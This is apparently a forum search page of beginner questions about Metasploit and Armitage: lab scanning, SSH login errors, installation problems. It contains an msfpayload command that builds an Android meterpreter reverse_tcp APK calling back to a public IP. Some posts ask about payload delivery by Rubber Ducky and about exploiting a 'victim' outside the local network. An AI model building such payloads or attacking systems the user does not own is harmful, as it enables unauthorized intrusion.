Search the Community

Digging my way through metasploit using armitage on my pentest lab. I have three VMs (of 15 installed) running 1.metasploitable 2.Windows XP32 SP2 3.CentOS Nmap scan via Armitage is finding metasploitable and CentoS but not the Windows XP machine (which is kinda funny actually). However when I run Zenmap separately, it finds that machine. All VMs are in the same network. Am I missing something for metasploit to see a Windows machine? Interestingly when I review the output from the scan, there is a line that says "All 65535 scanned ports on {IP ADDRESS} are filtered...maybe I should go back to using Windows XP...

How to upload my exe or apk payload for rubber ducky and how to use with armitage ?

how to upload my payload for rubber ducky and use with armitage

I am a kind of a noob on this one. I have this question. I share internet through tethering using my phone which is connected through the internet through the 3G network. I dont have any other way of accessing the internet, so no cable or wired connections. In the options for setting up an exploit in metasploit the LHOST option will not work if I set my public ip. This is because my ISP filters all incoming requests on all ports (The router is located at their site, no access).I would like to know if their is a way I could work around this, prefarably a free method.I already know I can use a VPS (Virtual Private Server) but thats expensive. Possible noobie solutions:proxies,VPNs.If this is a solution I would like to know how to setup the LPORT and LHOST. I am sorry if this has a simple answer. Environment: Kali linux version on VMware workstation--->Hosted on a windows machine Please help

Hi guys, I recently started learning more about ethical hacking and stumbled upon metasploit. It is a great tool but I am having an issue on a pen test, which is the following. I am trying to exploit my IPad Air- IOS 8.1.1 Jailbroken and I am using the exploit "exploit/apple_ios/ssh/cydia_default_ssh". Also the OS I am running is Kali Linux. I am able to setup the RHOST with my IP Address (192.168.1.2) and the default port 22. This data is confirmed and accurate as I did a nmap scan just before that showed me that the port 22 was open on that IP. Everything seems fine until i try to run the exploit, what happens is this: [*] 192.168.1.2:22 - Attempt to login as 'root' with password 'alpine' [-] 192.168.1.2:22 SSH Error: Net::SSH::Exception : could not settle on kex algorithm [*] 192.168.1.2:22 - Attempt to login as 'mobile' with password 'dottie' [-] 192.168.1.2:22 SSH Error: Net::SSH::Exception : could not settle on kex algorithm I have left the root:alpine login as per default in my ipad. I had even changed the password in my Ipad's terminal and tried to login via Armitage with SSH Login and the updated credentials. Still, I am always getting the same error and not sure what is going on. Can anyone help here? Cheers

hi when i try run this in a command terminal on my vmware kali box i get some message about using msfvenom can someone please turn my code into msfvenom code or whatever i need to make this work for android and armitage. thanks msfpayload android/meterpreter/reverse_tcp LHOST=147.69.30.122 LPORT=8080 R > nsf-2.apk

Hi All, Wonder if anyone could help me please? I am currently trying to create a Web Attack Vector using SET Tools for setting up, but would like the reverse handle to respond within Armitage instead of Metasploit within SET Tools. The reason i would like the attack to appear in Armitage is because of its GUI and screen shots for my reports look better than a terminal shell. I have attempted to do so using Apache to host the spoofed site and have Armitage running the exploit and listener. But not sure how to bind the exploit to the Apache page. If anyone could point me in the right direction to do either of the above that would be a great help. Thanks Gary

I'm running Ubuntu 12.04 and have been trying to get Armitage running correctly so I can learn and advance to more advanced methods. I got Metasploit installed just fine, but when I try to execute armitage I get the error "line 1: java: command not found" and nothing happens. What should I do from here to get it to work?

Hi, my question is how do we setup the metasplio(armitage) to work with the pineapple, ive seen some images of the cobalt strike with pineapple but it doesnt say how to set it up, can some one help me please, i have the newest pineapple mark IV

I have scanned for vulnerabilities with nessus, and i found this (PHP 5.4.x < 5.4.5 _php_stream_scandir Overflow). So i went to the www.exploit-db.com/exploits/19231/ where it is Exploit Code written in python, i tried to use it with metasploit+armitage. But i don't know how to load the script in the existing database on my pc, i am using windows 7, and the "victim" is not on local network, i am new to this so i need some help. Also i am asking for some tutorials, or useful links where can i learn new things.

Hello allz, I'm new on the forum and a bit of a noob whent it comes to backtrack. Here is the setup: Using VM i have a setup of 2 machines xp sp3 and backtrack 5 r3. Using armitage I gained control of the xp machine, but I was wondering if there is any way to remotely install software on that xp machine.